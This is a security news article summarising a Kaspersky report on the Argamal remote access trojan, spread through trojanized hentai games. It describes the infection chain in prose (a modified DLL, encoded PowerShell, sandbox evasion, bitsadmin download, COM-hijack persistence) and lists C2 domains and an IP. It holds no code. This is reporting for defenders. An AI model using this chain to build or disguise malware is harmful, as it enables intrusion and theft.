Argamal RAT Targets Hentai Gamers via Trojanized Games, Kaspersky Reports
Published
Key Takeaways
- Hentai Game Malware: Kaspersky discovered the Argamal malware family in April 2026, targeting players of hentai games with a full-featured RAT.
- Hundreds Infected: Victims were mainly located in Russia, Brazil, Germany, and Vietnam, with hundreds of individuals compromised.
- RAT Capabilities: The RAT can execute commands, take screenshots, manage files, and control input devices.
A new malware campaign targets players of hentai games with a remote access trojan (RAT). In April 2026, Kaspersky researchers discovered and named the malware family Argamal. Once launched, infected games install a previously unknown malicious implant. After a few days, the implant downloads and executes a Trojan, resulting in full system compromise and broad remote control capabilities.
Distribution via PixelDrain and AniRena
Trojanized games were delivered through dedicated websites with download links redirecting to PixelDrain, as well as via torrent trackers, including AniRena, a SecureList by Kaspersky report says.
The downloaded archive contained legitimate game files alongside a modified FFmpeg DLL and a file named natives2_blob.bin that executes a Base64-encoded PowerShell script upon loading.
The first stage checks for the presence of Sandboxie and Procmon64 to detect controlled environments. If clear, it sets persistence and creates a scheduled task that executes three days later.
The second stage downloads an encrypted payload from GitHub using bitsadmin.exe, decrypts it with AES-CBC, and establishes persistence through COM hijacking tied to the Windows Color System Calibration Loader.
The resulting payload is a RAT capable of fully controlling the infected machine, including executing commands, taking screenshots, managing files, and controlling input devices.
RAT Targets and Attribution
The C2 infrastructure uses the domains asper1.freeddns.org, Winst0.kozow.com, and country1.ignorelist.com, all pointing to IP 186.158.223.35. Hundreds of individuals were infected, with most victims in Russia, Brazil, Germany, and Vietnam.
Kaspersky assesses with medium confidence that the developer of the downloader chain speaks Spanish, based on variable names, code comments, and infrastructure data.
A March report revealed that XWorm RAT dominates the Malware-as-a-Service (MaaS) landscape with a 174% increase in detections. A Cross-Platform RAT was deployed in the Axios supply chain attack that occurred the sme month.
Related
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular
Get expert insights on threats, breaches, scams, and security trends — delivered every Monday.
Most Popular